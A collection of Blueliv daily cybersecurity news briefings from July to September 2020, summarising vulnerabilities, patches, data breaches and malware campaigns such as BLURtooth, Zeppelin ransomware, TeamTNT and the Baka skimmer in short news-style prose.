Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   September 10th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

BLURtooth vulnerability allows attacking Bluetooth encryption process

A security advisory explains that when CTKD is used for pairing dual-mode Bluetooth devices, the procedure happens only once over one of the two data transport methods. In the process, Long Term Keys / Link Keys (LTK/LK) are generated and they can be overwritten for cases where the transport enforces a higher level of security, which is what a BLUR attack takes advantage of. An attacker in the Bluetooth proximity of a vulnerable target device could spoof the identity of a paired device to overwrite the original key and access authenticated services. BLURtooth is also suitable for man-in-the-middle (MitM) type of attacks, with the attacker sits between two vulnerable devices that had been linked using authenticated pairing. Learn more >

Threat actors stole $5.4 million from ETERBASE Slovak cryptocurrency exchange

Slovak cryptocurrency exchange ETERBASE disclosed a security breach, the hackers stole Bitcoin, Ether, ALGO, Ripple, Tezos, and TRON assets worth $5.4 million. The company disclosed the hack on Thursday, threat actors have stolen various cryptocurrencies from its hot wallets, it also suspended all the transactions until September 10. The company notified law enforcement authorities that are investigating into the incident, it also informed its users that it has enough capital to meet all our obligations. Learn more >

Zeppelin Ransomware Returns with New Trojan on Board

The Zeppelin ransomware has sailed back into relevance, after a hiatus of several months. A wave of attacks were spotted in August making use of a new trojan downloader. These, like an initial Zeppelin wave observed in late 2019, start with phishing emails with Microsoft Word attachments (themed as “invoices”) that have malicious macros on board. Once a user enables macros, the infection process starts. The latest campaign has affected around 64 known victims and targets, indicating a certain level of targeting. It may have started in June 4, when the command-and-control server that the malware uses was registered Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   September 9th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Intel fixes critical vulnerabilities on ATM and ISM platforms

Intel today addressed nine security vulnerabilities with the release of the September 2020 Platform Update, one of them being a critical flaw impacting the Active Management Technology (AMT) and Intel Standard Manageability (ISM) platforms. These issues were detailed in five security advisories published by Intel on its Product Security Center, with fixes addressing them having been delivered to customers via the Intel Platform Update (IPU) process before disclosure. Intel also provides lists of affected products and support for vulnerable products at the end of each advisory, together with contact details for reporting other security issues found to affect Intel products or tech. Learn more >

Adobe patches critical vulnerabilities of code execution in AEM, FrameMaker and InDesign

Adobe has released security updates to address twelve critical vulnerabilities that could be exploited by attackers to execute arbitrary code on systems running vulnerable versions of Adobe InDesign, Adobe Framemaker, and Adobe Experience Manager. The company also addressed important severity 18 security vulnerabilities in the Adobe Experience Manager (AEM) and the AEM Forms add-on package that could lead to arbitrary JavaScript execution in the browser via stored cross-site scripting vulnerabilities or disclosure of sensitive information via execution with unnecessary privileges. Learn more >

Microsoft September 2020 Patch Tuesday fixes 129 vulnerabilities

Microsoft has published today its monthly batch of security updates, also known as Patch Tuesday. This month, the OS maker patched 129 vulnerabilities across 15 products, ranging from Windows to ASP.NET. Of note is that this month, of the 129 vulnerabilities, 32 were classified as remote code execution issues, which are bugs that permit attackers to exploit vulnerable applications remotely, over a network. Of these 32, 20 also received a severity classification of "critical," the highest rating on Microsoft's scale, making the 20 vulnerabilities some of the most important bugs patched across Microsoft products this month. Learn more >

Hackers use legitimate cloud monitoring tools to take over Docker, Kubernetes platforms

In a recent attack, cybercrime group TeamTNT relied on a legitimate tool to avoid deploying malicious code on compromised cloud infrastructure and still have a good grip on it. They used an opensource tool specifically created to monitor and control cloud environments with Docker and Kubernetes installations, thus reducing their footprint on the breached server. According to researchers, this may be the first time a legitimate third-party tool is abused to play the part of a backdoor in a cloud environment, also indicating the evolution of this particular group. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   September 8th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Windows credentials can be stolen through Windows 10 themes

This weekend a security researcher revealed that specially crafted Windows themes could be used to perform Pass-the-Hash attacks. Pass-the-Hash attacks are used to steal Windows login names and password hashes by tricking a user into accessing a remote SMB share that requires authentication. When trying to access the remote resource, Windows will automatically try to login to the remote system by sending the Windows user's login name and an NTLM hash of their password. In a Pass-the-Hash attack, the sent credentials are harvested by the attackers, who then attempt to dehash the password to access the visitors' login name and password. Learn more >

Data breach of Webmaster Forum Digital Point exposes over 800k users

On July 1, researchers uncovered an unsecured Elasticsearch database containing over 62 million records. In total, data belonging to 863,412 Digital Point users was included in the leak. According to the team, names, email addresses, and internal user ID numbers were made publicly available. In addition, internal records and user post details were stored in the open database. While examining the database to find out who the owner was, the researchers stumbled across sets of data relating to forum members who flagged posts and the reasons behind these reports -- including allegations of "bad business dealings," spam, and other reasons, some described as appearing to be "petty and personal." Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   September 7th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Visa alert: Baka credit card JavaScript skimmer

Baka is a sophisticated e-skimmer developed by a skilled malware developer that implements a unique obfuscation method and loader. The Baka loader works by dynamically adding a script tag to the current page that loads a remote JavaScript file. The JavaScript URL is hardcoded in the loader script in encrypted format, experts observed that the attackers can change the URL for each victim. The e-skimmer payload decrypts to JavaScript written to resemble code that would be used to render pages dynamically. The final payload and the loader use the same encryption method, once executed, the software skimmer steals the payment card data from the checkout form. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 27th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

New Zealand Stock Exchange: third day with its operations canceled after DDoS attack

As a result, they have suspended all operations until the attacks end or connectivity problems can be mitigated. The group uses names like Armada Collective and Fancy Bear — both borrowed from more famous hacker groups — to email companies and threaten DDoS attacks that can cripple operations and infer huge downtime and financial costs for the targets unless the victims pay a huge ransom demand in Bitcoin. Learn more >

Microsoft Azure vulnerabilities fixed

The first of two issues reside in the Normal World application READ_IMPLIES_EXEC personality that can be exploited through specially crafted shellcode that would cause a process’ heap to become executable. The vulnerability affects version 20.07 of Azure Sphere. The second issue of them was found in /proc/thread-self/mem and can be exploited via specially crafted shellcode designed to cause a process’ non-writable memory to be written to. An attacker could supply shellcode specifically designed to modify the program and trigger the vulnerability. Learn more >

North Korean threat actors BeagleBoyz target banks worldwide

The campaign, dubbed "FASTCash 2.0: North Korea's BeagleBoyz Robbing Banks," is an international operation designed to initiate fraudulent international money orders and ATM cash-outs. In the operation, North Korean operatives seek to gain unauthorized access to networks, point-of-sale systems, and ATMs belonging to their victims. According to the advisory, the BeagleBoyz have attempted to steal at least $2 billion since 2015 and have frequently left banking systems damaged or inoperative in their wake. Learn more >

Twitter pro-chinese propaganda botnet quote Bram Stoker’s Dracula

A research group said today it identified a Twitter botnet of around 3,000 bots that pushed pro-Chinese political spam, echoing official messaging released through state propaganda accounts. They were able to identify the botnet due to a quirk shared by the vast majority of bot accounts, most of which used quotes from Bram Stoker's Dracula book for the profile description and the first two tweets. The Dracula botnet, as they named this cluster of fake accounts, exhibited multiple similarities to past Twitter botnets that were part of Spamouflage Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   August 24th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Vulnerability in ATM vendors Diebold and NCR fixed

The flaws that could have allowed crooks to modify the amount of money they deposited on their card, so-called Deposit forgery, and make fraudulent cash withdrawals abusing of the new account balance. Once modified the account balance, the cybercriminals quickly attempt to make cash withdrawals, before the bank will detect the anomalous increase of the account balance. The two bugs, tracked as CVE-2020-9062 and CVE-2020-10124 affect respectively Diebold Nixdorf ProCash 2100xe USB ATMs running Wincor Probase software and NCR SelfServ ATMs running APTRA XFS software. Learn more >

Google Drive vulnerability could allow malware installation

The issue resides in the “manage versions” feature implemented in Google Drive allows users to upload and manage different versions of a file and in the interface that allows users to provides a new version of the files to the users. The “manage versions” feature was designed to allow Google Drive users to update an older version of a file with a new one having the same file extension, unfortunately, this is not true. The researchers, discovered that the functionally allows users to upload a new version with any file extension for any file stored on Google Drive, allowing the upload of malicious executables. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Friday,   August 21st,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Gmail flaw allowing email spoofing fixed

This issue was caused by "missing verification when configuring mail routes" as detailed by researchers. To exploit this flaw to send authenticated spoofed emails that could pass both SPF and DMARC, attackers would have to abuse a broken recipient issue in Google's mail validation rules and use an inbound email gateway to resend the message from Google's backend so that downstream mail servers would automatically trust it. Learn more >

Jenkins critical vulnerability causing data exposure fixed

This flaw has a CVSS rating of 9.4, and it influences the Eclipse Jetty versions 9.4.27.v20200227 to 9.4.29.v20200521, which is a full-featured tool; it implements a Java HTTP server and web box that is used in software frameworks. This vulnerability might enable unauthenticated threat actors to get HTTP response headers that may carry sensitive data planned for another user. Learn more >

IBM vulnerability affectig IoT devices patched

On Wednesday, IBM revealed the vulnerability, CVE-2020-15858, which it found last September in Thales' Cinterion EHS8 M2M modules. The flaw is also in related products, including the BGS5, EHS5/6/8, PDS5/6/8, ELS61, ELS81 and PLS62 modules. "This vulnerability could enable attackers to compromise millions of devices and access the networks or VPNs supporting those devices by pivoting onto the provider's backend network," researchers write. "In turn, intellectual property, credentials, passwords and encryption keys could all be readily available to an attacker". Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 20th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Windows remote access vulnerabilities fixed

For the vulnerabilities to be exploited, attackers would first need to code execution privileges on victims' devices to run a specially crafted application. KB4578013 addresses the vulnerabilities by correcting how Windows Remote Access handles memory and file operations. Customers running Windows 8.1 or Server 2012 R2 should install the update as soon as possible to be protected from attacks that could exploit this vulnerability. Learn more >

Experian South Africa data breach impacting 24M costumers

While Experian did not disclose the number of impacted users, a report from South African Banking Risk Centre (SABRIC), an anti-fraud and banking non-profit, claimed the breach impacted 24 million South Africans and 793,749 local businesses. Experian said it reported the incident to local authorities, which were able to track down the individual behind the incident. Since then, Experian said it obtained a court order, "which resulted in the individual's hardware being impounded and the misappropriated data being secured and deleted. Experian said that none of the data has been used for fraudulent purposes before being deleted and that the fraudster did not compromise its infrastructure, systems, or customer database. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   August 19th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Microsoft is removing insecure Cloud App Security cipher suites

Microsoft today announced that some insecure cipher suites currently supported by Microsoft Cloud App Security (MCAS) will be removed later this year. After that happens, Redmond will no longer provide support for connections using these non-secure cipher suites and they will no longer work as expected. To prepare for this incoming change, "[c]ustomers should ensure that all client-server and browser-server combinations are using supported suites in order to maintain the connection to Microsoft Cloud App Security". Learn more >

New Attack Alert: Duri

Duri leverages HTML smuggling to deliver malicious files to users’ endpoints by evading network security solutions such as sandboxes and legacy proxies. Isolation prevents this attack from infecting the endpoint. According to their observations, the Duri campaign started in the beginning of July and is currently active. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   August 18th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Cryptomining bot TeamTNT steals AWS credentials

The group would access the API and deploy servers inside the Docker install that would run DDoS and crypto-mining malware. According to researchers, the TeamTNT botnet is now targeting also misconfigured Kubernetes installations. The botnet operators have added a new feature that scans the underlying infected servers for any Amazon Web Services (AWS) credentials. The TeamTNT bot borrows the code from another worm tracked as Kinsing, which was spotted in April while targeting Docker clusters to deploy crypto-miners. Learn more >

Microsoft fixes Zero Day flaw reported 2 years ago

This vulnerability is tracked as CVE-2020-1464 and is described by Microsoft as a spoofing vulnerability in how Windows validates signature files. It was later noted in a blog post by some security researchers that this update is for a bug reported two years ago on August 18th, 2018, and that Microsoft originally stated they would not be fixing. With the patch for CVE-2020-1464, Windows will no longer considered MSI files to be signed if they have been tampered by having a JAR file appended to it. Learn more >

Notepad++ text editor banned in China

"I reject the idea that our given free speech rights are restrained by an authoritarian country. Notepad++ stands with the people of Hong Kong," the Stand with Hong Kong blog post stated. When trying to download the Notepad++ program using China-based web browsers, downloaders are greeted with interstitial messages saying the site has been blocked. "I am not surprised about their reaction. But since the free speech is basic right of everyone, I won't keep silent," creator of the software said. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Monday,   August 17th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Canadian govt accounts hijacked to steal COVID-19 funds

A statement from the Treasury Board of Canada Secretariat on Saturday revealed that the attackers had used tried-and-tested credential stuffing techniques to hijack GCKey and Canada Revenue Agency (CRA) accounts. The government claimed that 9041 users were affected by the campaign, and in a third of cases services were accessed illegally. Around 5500 CRA accounts were targeted by this and a separate credential stuffing attack on the tax office, it added. Affected GCKey accounts were cancelled as soon as the threat was discovered and departments are contacting users whose credentials were revoked to provide instructions on how to receive a new GCKey Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 13th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Vulnerability in 4G Voice over LTE (VoLTE) protocol used to eavesdrop on voice calls

For each call, mobile operators must select an encryption key (called a stream cipher) to secure the call. Normally, the stream cipher should be unique for each call. However, a team of academics from the Ruhr University in Bochum, Germany, has discovered that not all mobile operators follow the 4G standard to the letter of the law. Researchers say that while mobile operators do, indeed, support encrypted voice calls, many calls are encrypted with the same encryption key. In their research, academics said that the problem usually manifests at the base station (mobile cell tower) level, which, in most cases, reuse the same stream cipher, or use predictable algorithms to generate the encryption key for voice calls. Learn more >

Coronavirus ventilator manufacturer Boyce Technologies targeted by ransomware

The cybercriminals have threatened that more information will be disclosed next week through the site if an undisclosed crypto ransom is not paid by the firm. Boyce Technologies is well-known for its work in designing and manufacturing FDA-approved low-cost ventilators in just 30 days during the first months of the COVID-19 pandemic, amid the big demand for the machines across New York hospitals. Prior to the attack the company was making 300 units a day with the help of the robots built by the company. Learn more >

Alexa voice assistant, exploitable to hand over user data

Users are able to extend Alexa’s capabilities by installing “skills” – additional functionality developed by third-party vendors which can be thought of as apps – such as weather programs and audio features. The smart assistant, which is found in devices such as the Amazon Echo and Echo Dot -- with over 200 million shipments worldwide -- was found to be vulnerable to attackers seeking user personally identifiable information (PII) and voice recordings due to its subdomains being susceptible to Cross-Origin Resource Sharing (CORS) misconfiguration and cross-site scripting (XSS) attacks. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   August 12th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Google Chrome bug would let hackers bypass CSP protection

Tracked as CVE-2020-6519 (rated 6.5 on the CVSS scale), the issue stems from a CSP bypass that results in arbitrary execution of malicious code on target websites. Some of the most popular websites, including Facebook, Wells Fargo, Zoom, Gmail, WhatsApp, Investopedia, ESPN, Roblox, Indeed, TikTok, Instagram, Blogger, and Quora, were susceptible to the CSP bypass. Interestingly, it appears that the same flaw was also highlighted by Tencent Security Xuanwu Lab more than a year ago, just a month after the release of Chrome 73 in March 2019, but was never addressed until PerimeterX reported the issue earlier this March. Learn more >

Adobe Acrobat and Reader affected by critical flaws

The patches have been created for Acrobat DC, Acrobat Reader DC, Acrobat and Classic 2020, Acrobat Reader 2020, Acrobat/Reader 2017, and Acrobat/Reader 2015 on Windows and macOS machines. The important vulnerabilities range from sensitive data exposure, security bypass, stack exhaustion, and out-of-bounds read problems. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   August 11th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Threat actors hijack Tor exit nodes to perform SSL stripping attacks

According to a report published on Sunday the group managed 380 malicious Tor exit relays at its peak, before the Tor team made the first of three interventions to cull this network. The primary goal of these SSL stripping attacks was to allow the group to replace Bitcoin addresses inside HTTP traffic going to Bitcoin mixing services. Learn more >

Agent Tesla | Old RAT Uses New Tricks to Stay on Top

The new variants of Agent Tesla RAT now come with modules dedicated to stealing credentials from applications including popular web browsers, VPN software, as well as FTP and email clients. This malware is currently very popular with business email compromise (BEC) scammers who use it to infect their victims for recording keystrokes and taking screenshots of compromised machines. Learn more >

New zero-day RCE vBullentin bug patched

The zero-day is a bypass for a patch from a previous vBulletin zero-day — namely CVE-2019-16759, disclosed in September 2019. The previous zero-day allowed attackers to exploit a bug in the vBulletin template system to run malicious code and take over forums without needing to authenticate on the victim sites (a type of bug called a pre-auth RCE). However, a researcher said he found a simple way to bypass the patch and continue to exploit the same CVE-2019-16759 vulnerability Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Friday,   August 7th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

KrØØk vulnerability variant can impact Qualcomm and MediaTek Wi-Fi chips

Even though initially researchers said that only devices with Broadcom and Cypress Wi-Fi chips were affected, new KrØØk variants were discovered to also have impacted systems Qualcomm and MediaTek radios used in vehicles, navigation systems, watches, laptops, smartphones, routers, and other devices. These new findings greatly increase the number of vulnerable devices to KrØØk attacks and their variants if left unpatched. Learn more >

Unpatched vulnerabilities in Windows print spooler

The flaw CVE-2020-1048 affects Windows Print Spooler, the service that manages the printing process. Bypassing it has been classified as a new vulnerability that received the tracking number CVE-2020-1337. A fix will become available on August 11. Learn more >

Inter skimming kit used in homoglyph attacks

The idea consists of using characters that look the same in order to dupe users. Sometimes the characters are from a different language set or simply capitalizing the letter ‘i’ to make it appear like a lower case ‘l’. A threat actor with ties pointing to Magecart group is using this technique on several domain names to load the popular Inter skimming kit inside of a favicon file. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   August 6th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Firefox evil cursor bug fixed

The bug is a classic "evil cursor" attack and works because modern browsers allow site owners to modify how the mouse cursor looks while users are navigating their websites. Evil cursor attacks are typically weaponized by operators of tech support scam websites, who use this particular trick to keep users trapped on their sites -- as victims can't close tabs and popups due to the cursor visibility-click discrepancy. Learn more >

Vulnerability in Temi healthcare robots lets hackers remotely hijack enterprises

Robotemi Global's Temi is a "personal robot" that uses a range of sensors, artificial intelligence (AI) and machine learning (ML) technologies, as well as modern voice activation and mobile connectivity to perform functions including personal assistance tasks, answering Internet queries, and facilitating remote video calls. In total, four vulnerabilities were found, the use of hard-coded credentials, an origin validation error, missing authentication for critical functions, and an authentication bypass. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   August 4th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

WordPress Newsletter plugin vulnerabilities affecting over 300k sites patched

There are at least 150,000 WordPress sites with active Newsletter installations still potentially left exposed to potential attacks if hackers start exploiting these bugs as part of future campaigns. Newsletter users are urged to update the plugin to the 6.8.3 version as soon as possible to block attacks designed to add rogue admins or to inject backdoors on their sites given that threat actors frequently use already fixed WordPress plugin vulnerabilities in their attacks. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Thursday,   July 23rd,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

IBM vulnerability in IVG patched

Issued a CVSS severity score of 7.5, the vulnerability CVE-2020-4400 has been caused by an account lockout mechanism deemed "inadequate" which does not prevent multiple access attempts. In automated brute-force attacks, threat actors will hammer a system with usernames and passwords until they come across the right combinations, and to prevent these forms of attacks from being successful, software will often include login attempt restrictions. Learn more >

Signed PDF documents can be modified by a “Shadow Attack”

Fifteen out of 28 desktop PDF viewer applications are vulnerable to a new attack that lets malicious threat actors modify the content of digitally signed PDF documents. The main idea behind a Shadow Attack is the concept of "view layers" - different sets of content that are overlaid on top of each other inside a PDF document. Learn more >

Prometei cryptojacking botnet exploits Windows SMB

In total, the botnet has over 15 executable modules that are controlled by one main module. The botnet is organized into two main function branches: one C++ branch dedicated to cryptocurrency mining operations, and one - based on .NET - which focuses on credential theft, the abuse of SMB, and obfuscation. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   July 22nd,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Dozens of unsecured databases wiped in a “Meow” attack

The most recent publicly known example of a Meow attack is an Elasticsearch database belonging to a VPN provider that claimed not to keep any logs. The discoverer explained the database was initially secured in July only to become exposed again five days later. Learn more >

Adobe critical vulnerabilities in Photoshop, Bridge and Prelude fixed

For users who are running as a standard Windows users, and not an administrative account, the impact of these vulnerabilities are greatly restricted unless chained with another vulnerability that elevates privileges. Adobe advises users to update the vulnerable apps to the latest versions to block attacks attempting to exploit unpatched installations. Learn more >

Citrix vulnerability that allows remote hacking fixed

“By sending a crafted message over a named pipe and spoofing the client process ID, the Citrix Workspace Updater Service can be tricked into executing an arbitrary process under the SYSTEM account,” researchers explain “Whilst a low privilege account is required to perform the attack, environments that do not implement SMB signing are particularly vulnerable since an attack can be achieved without knowing valid credentials through NTLM credential relaying.” Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Tuesday,   July 21st,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Welcome Chat, a malicious app bundled with spyware

The website of the application claims to be a secure chat plataform and available on the Google Play store, of which neither is true. In addition to monitoring the users' chat history, the malicious app also exfiltrates SMS and history logs, contact list, GPS, user photos, recorded calls and device information. There is evidence to believe that the app is not a 'trojanized app' and was developed with malicious intents from the start. Learn more >

F5 BIG-IP Networking Products still Unpatched

The vulnerability CVE-2020-5902 allows for remote execution of arbitrary system commands on vulnerable BIG-IP devices with an exposed and accessible management port via the Traffic Management User Interface (TMUI). This vulnerability could provide complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serve as a hop point into other areas of the network. Learn more >

Windows 10 boot bug fixed

To prevent this issue, Microsoft is using an automated troubleshooter — instead of applying an update block — to prevent Disk Cleanup from launching on its own and causing boot issues until the users install the Windows version 19041.84 update which comes with a fix for this bug. "This troubleshooter automatically runs twice. It runs for the first time on all devices on Windows version 19041.21," Microsoft says. "It then runs again after devices are upgraded to Windows version 19041.84. This troubleshooter cannot be run manually." Learn more >

SIGred Windows DNS bug gets micropatch

SIGRed stems from a flaw in how Microsoft implemented the DNS server role and affects all Windows DNS server versions starting 2003. Experts say that the official patch had three integer overflow/underflow checks, “for one subtraction and two addition operations.” The micropatch is similar but also detects logs and shows an exploit attempt when detecting the over/underflow. Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Friday,   July 17th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

New ATM “black box” attacks across Europe

A black box attack is when an intruder unfastens an ATM outer case to access its ports or cuts a hole in the casing for direct access to its internal wiring or other hidden connectors. Using these access points, the attacker then connects a "black box" device -- usually a laptop or Raspberry Pi board -- to the ATM's internal components, which they use to send commands to the ATM's cash dispenser and release cash from the storage cassettes. Learn more >

Google exposes a bug that show security alerts for TiVo devices

For the past two weeks, TiVO Stream 4K owners say that as soon as they link their account on the device, Google sends them an alert warning in their inboxes, warning that the device has extensive access to their personal data and that Google has not verified the device/app developer. In addition, the message also urges users to unlink their account from the device, an advice that some users have followed. Learn more >

Russian hackers target COVID-19 research centers with malware

APT29 uses a variety of tools and techniques, including spear-phishing and custom malware known as “WellMess” and “WellMail”, according to some experts, who have also assessed that the hacking group “almost certainly operate[s] as part of Russian Intelligence Services.” Learn more >

Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday,   July 15th,   2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Adobe’s Creative Cloud vulnerabilities fixed

These important severity vulnerabilities were found in Adobe ColdFusion and Adobe Genuine Service, and they affect both Windows and macOS devices running unpatched software versions. Adobe advises users to update the vulnerable apps to the latest versions to block attacks attempting to exploit unpatched installations. Learn more >